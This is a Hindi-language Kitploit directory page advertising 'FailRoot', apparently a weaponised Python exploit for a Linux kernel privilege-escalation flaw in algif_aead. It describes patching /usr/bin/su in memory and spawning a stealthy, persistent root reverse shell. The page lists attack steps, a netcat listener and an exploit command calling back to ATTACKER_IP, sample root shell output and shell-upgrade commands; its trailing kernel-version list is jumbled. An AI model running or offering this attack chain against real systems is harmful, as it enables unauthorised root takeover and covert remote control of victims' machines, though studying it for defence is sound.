Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-31431-REVSHELL — हथियारबंद Python एक्सप्लॉइट CVE-2026-31431 के लिए, Linux कर्नेल विशेषाधिकार वृद्धि को एक डेमॉनाइज़्ड रूट रिवर्स शेल के साथ जोड़ता है, जिसमें पूर्ण PTY शामिल है, और /usr/bin/su को मेमोरी में पैच करता है। | Kitploit
उपकरण/GitHubGitHub/danimrtzp/cve-2026-31431-revshell
विशेषाधिकार वृद्धिशोषण फ्रेमवर्कभेद्यता विश्लेषणशोषणपोस्ट-शोषणपेनिट्रेशन टेस्टिंगरेड टीमिंगपेलोड डेवलपमेंट

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
GitHub
danimrtzp/cve-2026-31431-revshell

CVE-2026-31431-REVSHELL

हथियारबंद Python एक्सप्लॉइट CVE-2026-31431 के लिए, Linux कर्नेल विशेषाधिकार वृद्धि को एक डेमॉनाइज़्ड रूट रिवर्स शेल के साथ जोड़ता है, जिसमें पूर्ण PTY शामिल है, और /usr/bin/su को मेमोरी में पैच करता है।

रिपॉजिटरी देखें
94 महीने पहलेअभी तक समीक्षित नहीं


root@kitploit:~
  █▀▀ ▄▀█ █ █   █▀█ █▀█ █▀█ ▀█▀
  █▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░

  CVE-2026-31431  •  Linux Kernel LPE  →  Root Reverse Shell

अवलोकन

FailRoot एक हथियारबंद एक्सप्लॉइट है CVE-2026-31431 के लिए — लिनक्स कर्नेल के crypto: algif_aead सबसिस्टम में एक आउट-ऑफ-बाउंड राइट।

यह विशेषाधिकार वृद्धि को पूर्ण PTY के साथ डेमॉनाइज़्ड रूट रिवर्स शेल से जोड़ता है:

root@kitploit:~
AF_ALG + splice()  →  4-बाइट पेज-कैश राइट  →  /usr/bin/su पैच  →  root

पूरा एक्सप्लॉइट एक ही फ़ाइल में समाहित है। कोई कंपाइलेशन नहीं। कोई बाहरी निर्भरता नहीं। डिस्क पर कोई निशान नहीं — su बाइनरी केवल मेमोरी में पैच की जाती है।


यह क्या करता है

  1. तुरंत डेमॉनाइज़ होता है — डबल-फोर्क, टर्मिनल से अलग होता है, तुरंत प्रॉम्प्ट लौटाता है
  2. कर्नेल मॉड्यूल लोड करता है — algif_aead + authencesn कई फ़ॉलबैक रणनीतियों के माध्यम से
  3. CVE-2026-31431 का शोषण करता है — /usr/bin/su पेज कैश में 4 नियंत्रित बाइट्स लिखता है
  4. रूट PTY रिवर्स शेल स्पॉन करता है — pty.spawn("/usr/bin/su") → पूर्णतः इंटरैक्टिव रूट TTY

रिवर्स शेल टर्मिनल बंद होने पर भी बना रहता है (SIGHUP अनदेखा किया जाता है), टारगेट पर शून्य आउटपुट दिखाता है, और 3 मिनट तक रीट्राय के साथ कनेक्ट होता है।


उपयोग

root@kitploit:~
# हमलावर — लिसनर शुरू करें:
nc -lvnp 4444

# टारगेट — एक्सप्लॉइट चलाएँ (कुछ भी नहीं दिखेगा, यह तुरंत डेमॉनाइज़ हो जाता है):
python3 exploit.py <ATTACKER_IP> 4444
root@kitploit:~
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)

TTY अपग्रेड (हमलावर की ओर से, शेल के अंदर)

root@kitploit:~
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash

प्रभावित कर्नेल


आवश्यकताएँ

  • Python >= 3.10 (os.splice())
  • /usr/bin/su तक पढ़ने की पहुँच (सभी डिस्ट्रो पर वर्ल्ड-रीडेबल)
  • कर्नेल मॉड्यूल algif_aead और authencesn उपलब्ध हों
  • कोई sudo आवश्यक नहीं

लेखक

danimrtzp


अस्वीकरण

केवल अधिकृत सुरक्षा अनुसंधान और शिक्षा के लिए। दुरुपयोग अवैध है।

टूल डाउनलोड करें
सेतक (अनन्य)
4.145.10.254
5.115.15.204
5.166.1.170
6.26.6.137
6.76.12.85
6.136.18.22
6.196.19.12
7.0rc1–rc6